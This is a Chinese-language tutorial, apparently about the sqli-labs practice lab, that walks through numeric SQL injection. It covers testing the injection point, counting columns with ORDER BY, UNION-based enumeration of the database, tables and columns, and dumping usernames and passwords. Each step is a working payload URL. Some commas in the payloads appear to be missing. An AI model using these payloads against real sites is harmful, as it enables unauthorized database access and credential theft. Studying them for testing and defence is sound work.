快捷搜索:  汽车  科技

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)确定显示为是2,3字段http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=2 union select 1 2 3 -- http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=1 -- 闭合语句发现页面正常显示http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=1 order by 3 -- 通过排序确定该表的字段数为3

sql注入数字型

一、判断注入点类型

1、单引号测试

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(1)

通过报错猜测是数字型注入;

2、进行验证:

http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=1 -- 闭合语句发现页面正常显示

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(2)

二、确定字段数

http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=1 order by 3 --

通过排序确定该表的字段数为3

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(3)

三、使用联合查询,确定显示位置

http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=2 union select 1 2 3 --

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(4)

确定显示为是2,3字段

四、查询库名以及敏感信息

http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=2 union select 1 version() database() --

字段数为3,所以1在这表示占位,version()查询数据库版本,database()查询数据库库名

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(5)

得到MySQL版本:5.7.36 当前数据库名:security

五、查询表名

http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=2 union select 1 2 group_concat(table_name) from information_schema.tables where table_schema="security" --

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(6)

security数据库中有四个表:emails referers uagents users

六、查询列名

http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=2 union select 1 2 group_concat(column_name) from information_schema.columns where table_name="users" --

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(7)

查询发现对我们有用的字段:username password

七、查询用户名和密码

http://192.168.110.189/sqlinto/Less-2/?id=1 and 1=2 union select 1 2 group_concat(username ' ' password "<br>") from users --

网站sql注入渗透测试手法介绍(渗透测试SQL注入原理-数字型注入)(8)

得到数据

猜您喜欢: